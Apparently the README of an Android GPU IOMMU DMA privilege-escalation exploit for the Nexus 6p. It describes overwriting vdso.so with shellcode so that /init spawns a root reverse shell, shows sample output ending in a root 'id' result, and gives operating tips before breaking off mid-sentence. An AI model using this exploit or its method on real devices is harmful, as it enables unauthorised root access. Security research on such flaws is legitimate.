
Exploit GPU IOMMU DMA pour les appareils Android qui écrase vdso.so avec un shellcode pour élever les privilèges et générer un shell root inversé sur Nexus 6p.
Tested under Nexus 6p (google/angler/angler:6.0.1/MMB29M/2431559:user/release-keys)
Discuté en 2016 via Blackhat EU
Avec des écritures DMA iommu, vdso.so est écrasé avec du shellcode.
Ainsi, après que /init exécute __kernel_clock_gettime, le shellcode sera exécuté.
Le processus /init se reconnecte ensuite avec un shell root.
Reverse shell target: 127.0.0.1:4919
shellcode patch done
hook patch done
Waiting for reverse connect shell...
TERMINAL>>>
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0
Supprimez /data/local/tmp/x s'il existe avant l'exploit.
Si le temps d'attente est trop long, essayez d'ouvrir les options 'Heure et date' dans les paramètres de votre téléphone.
Vérifiez la version d'Adreno, actuellement elle est construite pour 4xx.
Pour 5xx et supérieur: